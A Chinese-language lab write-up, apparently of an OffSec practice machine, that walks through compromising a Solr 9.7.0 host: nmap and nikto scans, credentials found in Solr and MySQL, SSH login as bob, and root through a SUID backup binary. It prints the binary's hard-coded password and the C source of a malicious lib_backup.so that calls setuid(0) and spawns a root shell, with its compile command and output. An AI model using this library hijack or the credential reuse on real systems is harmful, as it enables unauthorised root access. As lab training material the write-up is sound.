主要知识点
- Solr misconfiguration 漏洞利用
- 密码爆破
- 动态库劫持提权
具体步骤
信息收集
nmap扫描,22,3306,8983端口开放,应该运行了ssh,mysql和未知应用
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-20 23:42 UTC
Nmap scan report for 192.168.55.205
Host is up (0.00051s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA)
|_ 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519)
3306/tcp open mysql MySQL 8.0.41-0ubuntu0.24.04.1
| mysql-info:
| Protocol: 10
| Version: 8.0.41-0ubuntu0.24.04.1
| Thread ID: 11
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, ODBCClient, InteractiveClient, LongColumnFlag, Speaks41ProtocolOld, SwitchToSSLAfterHandshake, SupportsTransactions, IgnoreSigpipes, ConnectWithDatabase, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, FoundRows, LongPassword, SupportsCompression, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: U\x12(egs3&G1\x11`\x025\x1A\x1FIyF_
|_ Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.41_Auto_Generated_Server_Certificate
| Not valid before: 2025-02-17T15:27:47
|_Not valid after: 2035-02-15T15:27:47
|_ssl-date: TLS randomness does not represent time
8983/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Bad Request
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest, HTTPOptions:
| HTTP/1.1 302 Found
| Location: /solr/
| Help:
| HTTP/1.1 400 Bad Request
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Bad Request
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 HTTP Version Not Supported
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq, TLSSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x3</pre>
nikto扫描,有solr路径
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.55.205
+ Target Hostname: 192.168.55.205
+ Target Port: 8983
+ Start Time: 2025-02-20 23:50:23 (GMT0)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: /solr/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /favicon.ico: identifies this app/server as: jetty (5.1.14). See: https://en.wikipedia.org/wiki/Favicon
+ /solr/#/: Apache Solr console found.
+ 8103 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2025-02-20 23:50:34 (GMT0) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
反问一下8983端口下的solr路径看一下,安装了Solr 9.7.0版本
打破边界
在界面多逛一逛,发现了一组用户名和密码
用该credentials可以成功登录mysql,而在mysql中可以发现其他的credentials
我虽然没能成功爆破,不过在google上发现了一个字典文件,里面有bob对应的密码hash,得到了bob的密码sunflower,可以成功登录ssh
C:\home\kali\Documents\OFFSEC\GoToWork\dev_working> ssh bob@192.168.163.205
bob@192.168.163.205's password:
......
......
BSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$ bash
bob@dev01:~$
提权
首先该用户bob 没有sudo权限,但是发现了suid的可执行文件 /home/bob/backup,而backup的所有者是root用户,所以这可能是一个潜在的提权点
$ find / -type f -perm -4000 2>/dev/null
......
......
/home/bob/backup
$ ls -lart
total 48
-rw-r--r-- 1 bob bob 807 Mar 31 2024 .profile
-rw-r--r-- 1 bob bob 3771 Mar 31 2024 .bashrc
-rw-r--r-- 1 bob bob 220 Mar 31 2024 .bash_logout
drwxr-xr-x 4 root root 4096 Feb 17 14:58 ..
-rwsr-xr-x 1 root root 14472 Feb 17 15:28 backup
-rw-r--r-- 1 root root 52 Feb 17 15:28 mydata.txt
lrwxrwxrwx 1 root root 9 Feb 17 15:28 .bash_history -> /dev/null
-rw-r--r-- 1 bob bob 33 Feb 20 23:52 local.txt
drwx------ 2 bob bob 4096 Feb 21 00:24 .cache
drwxr-x--- 3 bob bob 4096 Feb 21 00:24 .
执行一下backup,发现需要密码,所以先观察一下backup的代码,得到密码: B4cup32M4n4age,并且知道了backup在执行的时候会调用 ./lib_backup.so,所以思路就比较清晰了,劫持lib_back.so来提权
$ strings backup
......
......
Welcome to the Gagup Backup Manager!
Are you sure you want to back up the file
Error creating destination folder
Error opening destination file
Backup completed successfully.
Advanced Backup Tool: Use with care.
Are you sure you want to proceed with the advanced backup? (yes/no or y/n):
advance_backup_custom_implementation
Incorrect password. Exiting...
/home/bob/backup_history
%s/%s
/home/bob/mydata.txt
[1;%sm%s
to
? (yes/no or y/n):
Backup cancelled.
Error opening source file
Backed up:
Advanced backup cancelled.
./lib_backup.so
Advanced backup completed
Enter the password:
%255s
B4cup32M4n4age
===== Backup Menu =====
1. Simple Backup
2. Advanced Backup
3. Exit
Choose an option:
Exiting... Goodbye!
在/bob/home路径下创建lib_backup.c文件,内容为
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
编译
bob@dev01:~$ touch lib_backup.c
bob@dev01:~$ vi lib_backup.c
bob@dev01:~$ gcc -fPIC -shared -o lib_backup.so lib_backup.c -nostartfiles
lib_backup.c: In function ‘_init’:
lib_backup.c:7:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
7 | setgid(0);
| ^~~~~~
lib_backup.c:8:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
8 | setuid(0);
| ^~~~~~
bob@dev01:~$ ls -l
total 48
-rwsr-xr-x 1 root root 14472 Feb 17 15:28 backup
drwx------ 2 root bob 4096 Feb 21 00:34 backup_history
-rw-rw-r-- 1 bob bob 163 Feb 21 00:46 lib_backup.c
-rwxrwxr-x 1 bob bob 14328 Feb 21 00:46 lib_backup.so
-rw-r--r-- 1 bob bob 33 Feb 20 23:52 local.txt
-rw-r--r-- 1 root root 52 Feb 17 15:28 mydata.txt
运行backup,提权成功
bob@dev01:~$ ./backup
██████╗ █████╗ ██████╗ ██╗ ██╗██████╗
██╔════╝ ██╔══██╗██╔════╝ ██║ ██║██╔══██╗
██║ ███╗███████║██║ ███╗██║ ██║██████╔╝
██║ ██║██╔══██║██║ ██║██║ ██║██╔═══╝
╚██████╔╝██║ ██║╚██████╔╝╚██████╔╝██║
╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝
Welcome to the Gagup Backup Manager!
Enter the password: > B4cup32M4n4age
===== Backup Menu =====
1. Simple Backup
2. Advanced Backup
3. Exit
Choose an option: 2
Advanced Backup Tool: Use with care.
Are you sure you want to proceed with the advanced backup? (yes/no or y/n): yes
root@dev01:~# id
uid=0(root) gid=0(root) groups=0(root),1001(bob)
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
